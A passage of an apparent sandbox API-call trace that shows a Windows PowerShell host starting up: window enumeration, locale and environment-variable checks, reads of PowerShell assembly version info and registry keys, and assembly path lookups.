	[0131.145] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7c0
	[0131.145] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x364
	[0131.145] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x240
	[0131.145] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x560
	[0131.146] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x57c
	[0131.146] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x7b0
	[0131.146] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x6a4
	[0131.146] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x32c
	[0131.146] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x670
	[0131.146] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x50c
	[0131.146] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x514
	[0131.146] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4f0
	[0131.147] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x58c
	[0131.147] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x458
	[0131.147] GetWindowThreadProcessId (in: hWnd=0x10086, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x4f4
	[0131.147] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x794
	[0131.147] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x458
	[0131.147] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1cd980 | out: lpdwProcessId=0x1cd980) returned 0x778
	[0131.153] WerSetFlags () returned 0x0
	[0131.164] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0131.259] CoTaskMemFree (pv=0x0) 
	[0131.260] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cdce8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cdce0 | out: pulNumLanguages=0x1cdce8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1cdce0) returned 1
	[0131.260] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1cdce8, pwszLanguagesBuffer=0x2c178b8, pcchLanguagesBuffer=0x1cdce0 | out: pulNumLanguages=0x1cdce8, pwszLanguagesBuffer=0x2c178b8, pcchLanguagesBuffer=0x1cdce0) returned 1
	[0131.267] CoTaskMemAlloc (cb=0x24) returned 0x2d57f0
	[0131.267] GetUserDefaultLocaleName (in: lpLocaleName=0x2d57f0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0131.268] CoTaskMemFree (pv=0x2d57f0) 
	[0131.298] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0131.298] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.298] CoTaskMemFree (pv=0x23ecf0) 
	[0131.301] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0131.301] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.301] CoTaskMemFree (pv=0x23ecf0) 
	[0131.303] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0131.304] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.304] CoTaskMemFree (pv=0x23ecf0) 
	[0131.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.568] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.568] SetErrorMode (uMode=0x1) returned 0x1
	[0131.568] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cd960 | out: lpFileInformation=0x1cd960*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0131.568] SetErrorMode (uMode=0x1) returned 0x1
	[0131.568] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cdbd0 | out: lpdwHandle=0x1cdbd0) returned 0x94c
	[0131.570] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c1b148 | out: lpData=0x2c1b148) returned 1
	[0131.571] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdb48, puLen=0x1cdb40 | out: lplpBuffer=0x1cdb48*=0x2c1b1e4, puLen=0x1cdb40) returned 1
	[0131.571] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x2c1b2c0, puLen=0x1cdab0) returned 1
	[0131.571] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0131.571] CoTaskMemAlloc (cb=0x2e) returned 0x2e40f0
	[0131.571] lstrcpyW (in: lpString1=0x2e40f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0131.571] CoTaskMemFree (pv=0x2e40f0) 
	[0131.571] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x2c1b314, puLen=0x1cdab0) returned 1
	[0131.571] lstrlenW (lpString="System.Management.Automation") returned 28
	[0131.571] CoTaskMemAlloc (cb=0x3c) returned 0x2e54c0
	[0131.572] lstrcpyW (in: lpString1=0x2e54c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0131.572] CoTaskMemFree (pv=0x2e54c0) 
	[0131.572] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x2c1b370, puLen=0x1cdab0) returned 1
	[0131.572] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0131.572] CoTaskMemAlloc (cb=0x20) returned 0x2e11b0
	[0131.572] lstrcpyW (in: lpString1=0x2e11b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0131.572] CoTaskMemFree (pv=0x2e11b0) 
	[0131.572] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x2c1b3b0, puLen=0x1cdab0) returned 1
	[0131.572] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0131.572] CoTaskMemAlloc (cb=0x44) returned 0x2e54c0
	[0131.572] lstrcpyW (in: lpString1=0x2e54c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0131.573] CoTaskMemFree (pv=0x2e54c0) 
	[0131.573] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x2c1b418, puLen=0x1cdab0) returned 1
	[0131.573] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0131.573] CoTaskMemAlloc (cb=0x76) returned 0x27c080
	[0131.573] lstrcpyW (in: lpString1=0x27c080, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0131.573] CoTaskMemFree (pv=0x27c080) 
	[0131.573] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x2c1b4b4, puLen=0x1cdab0) returned 1
	[0131.573] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0131.573] CoTaskMemAlloc (cb=0x44) returned 0x2e54c0
	[0131.573] lstrcpyW (in: lpString1=0x2e54c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0131.573] CoTaskMemFree (pv=0x2e54c0) 
	[0131.573] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x2c1b518, puLen=0x1cdab0) returned 1
	[0131.573] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0131.573] CoTaskMemAlloc (cb=0x58) returned 0x296b20
	[0131.573] lstrcpyW (in: lpString1=0x296b20, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0131.573] CoTaskMemFree (pv=0x296b20) 
	[0131.573] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x2c1b594, puLen=0x1cdab0) returned 1
	[0131.573] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0131.573] CoTaskMemAlloc (cb=0x20) returned 0x2e11b0
	[0131.573] lstrcpyW (in: lpString1=0x2e11b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0131.574] CoTaskMemFree (pv=0x2e11b0) 
	[0131.574] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x2c1b23c, puLen=0x1cdab0) returned 1
	[0131.574] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0131.574] CoTaskMemAlloc (cb=0x66) returned 0x2dfd50
	[0131.574] lstrcpyW (in: lpString1=0x2dfd50, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0131.574] CoTaskMemFree (pv=0x2dfd50) 
	[0131.574] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x0, puLen=0x1cdab0) returned 0
	[0131.574] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x0, puLen=0x1cdab0) returned 0
	[0131.574] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdab8, puLen=0x1cdab0 | out: lplpBuffer=0x1cdab8*=0x0, puLen=0x1cdab0) returned 0
	[0131.574] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cda88, puLen=0x1cda80 | out: lplpBuffer=0x1cda88*=0x2c1b1e4, puLen=0x1cda80) returned 1
	[0131.574] CoTaskMemAlloc (cb=0x204) returned 0x2867a0
	[0131.574] VerLanguageNameW (in: wLang=0x0, szLang=0x2867a0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0131.574] CoTaskMemFree (pv=0x2867a0) 
	[0131.574] VerQueryValueW (in: pBlock=0x2c1b148, lpSubBlock="\\", lplpBuffer=0x1cdad8, puLen=0x1cdad0 | out: lplpBuffer=0x1cdad8*=0x2c1b170, puLen=0x1cdad0) returned 1
	[0131.584] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0131.584] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.584] CoTaskMemFree (pv=0x23ecf0) 
	[0131.586] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0131.586] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.586] CoTaskMemFree (pv=0x23ecf0) 
	[0131.588] lstrlenW (lpString="䅁") returned 1
	[0131.594] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd9a8 | out: phkResult=0x1cd9a8*=0x318) returned 0x0
	[0131.595] RegOpenKeyExW (in: hKey=0x318, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd998 | out: phkResult=0x1cd998*=0x31c) returned 0x0
	[0131.595] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cda28 | out: phkResult=0x1cda28*=0x320) returned 0x0
	[0131.601] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd96c, lpData=0x0, lpcbData=0x1cd968*=0x0 | out: lpType=0x1cd96c*=0x1, lpData=0x0, lpcbData=0x1cd968*=0x56) returned 0x0
	[0131.602] CoTaskMemAlloc (cb=0x5a) returned 0x2dfce0
	[0131.602] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd93c, lpData=0x2dfce0, lpcbData=0x1cd938*=0x56 | out: lpType=0x1cd93c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd938*=0x56) returned 0x0
	[0131.602] CoTaskMemFree (pv=0x2dfce0) 
	[0131.705] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.709] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.717] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0131.740] CoTaskMemAlloc (cb=0x104) returned 0x23ecf0
	[0131.741] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ecf0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0131.741] CoTaskMemFree (pv=0x23ecf0) 
	[0132.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0132.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0132.581] CoTaskMemAlloc (cb=0x104) returned 0x23ee00
	[0132.581] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.582] CoTaskMemFree (pv=0x23ee00) 
	[0132.583] CoTaskMemAlloc (cb=0x104) returned 0x23ee00
	[0132.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.583] CoTaskMemFree (pv=0x23ee00) 
	[0132.713] CoTaskMemAlloc (cb=0x104) returned 0x23ee00
	[0132.713] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.713] CoTaskMemFree (pv=0x23ee00) 
	[0132.713] CoTaskMemAlloc (cb=0x104) returned 0x23ee00
	[0132.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.714] CoTaskMemFree (pv=0x23ee00) 
	[0132.714] CoTaskMemAlloc (cb=0x104) returned 0x23ee00
	[0132.714] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0132.714] CoTaskMemFree (pv=0x23ee00) 
	[0133.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0133.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0133.135] CoTaskMemAlloc (cb=0x104) returned 0x23ee00
	[0133.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.135] CoTaskMemFree (pv=0x23ee00) 
	[0133.139] CoTaskMemAlloc (cb=0x104) returned 0x23ee00
	[0133.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23ee00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0133.139] CoTaskMemFree (pv=0x23ee00) 
	[0133.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0133.486] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0134.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0134.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0134.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0134.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0135.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0135.353] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0136.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0136.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x1cd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0136.241] CoTaskMemAlloc (cb=0x104) returned 0x23f020
	[0136.241] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x23f020, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0136.241] CoTaskMemFree (pv=0x23f020) 
	[0136.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0136.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
